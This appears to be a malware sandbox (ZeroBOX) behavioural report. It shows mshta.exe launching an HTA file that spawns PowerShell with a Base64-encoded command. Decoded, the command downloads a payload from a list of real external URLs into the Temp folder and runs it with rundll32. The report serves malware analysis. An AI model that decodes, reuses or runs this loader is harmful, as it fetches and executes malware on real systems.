popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Sbiqfcpir.hta

    940

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVQBuAHAAbwBpAHMAbwBuAGUAZABQAHIAaQBuAGMAaQBwAGEAbABpAHQAaQBlAHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBoAG8AdABlAGwAbABvAHMAbQBpAHIAdABvAHMALgBjAG8AbQAvAHMAagBuAC8AUABRAGkAeQBOAGYAcgBtAFUAbQAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwA1AHgAeQBJAHQAYQA0AEoALABoAHQAdABwAHMAOgAvAC8AYwBpAHQAeQB0AGUAYwBoAC0AcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvADYATQBoADEAawAvAGIATABkAGQAbwBDADUAdwAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvAGkAdwBqAHYAVwBXAFEASwAxAEwAWABHACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAGYAdQBtAEIARQA0AGgAbABtADkALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBUADgAWABlAFUAVAByAGEALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AOQB2AFkAdABtAFoALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwAwADgAagBYAEIANABYADkAQgBGACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGcAaQBlAEEAbQBhAGsAZQBiAGUAIABpAG4AIAAkAFUAbgBwAG8AaQBzAG8AbgBlAGQAUAByAGkAbgBjAGkAcABhAGwAaQB0AGkAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABnAGkAZQBBAG0AYQBrAGUAYgBlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABEAGUAYwBhAG4AbwBsAC4AZQB4AGkAZwBpAGIAbABlAFAAbABlAHQAaABvAHIAYQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEQAZQBjAGEAbgBvAGwALgBlAHgAaQBnAGkAYgBsAGUAUABsAGUAdABoAG8AcgBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAEUAQQBHAFUAQQBZAHcAQgBoAEEARwA0AEEAYgB3AEIAcwBBAEMANABBAFoAUQBCADQAQQBHAGsAQQBaAHcAQgBwAEEARwBJAEEAYgBBAEIAbABBAEYAQQBBAGIAQQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEASABJAEEAWQBRAEEAcwBBAEUAMABBAGIAdwBCADAAQQBHAFEAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="

      2152

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf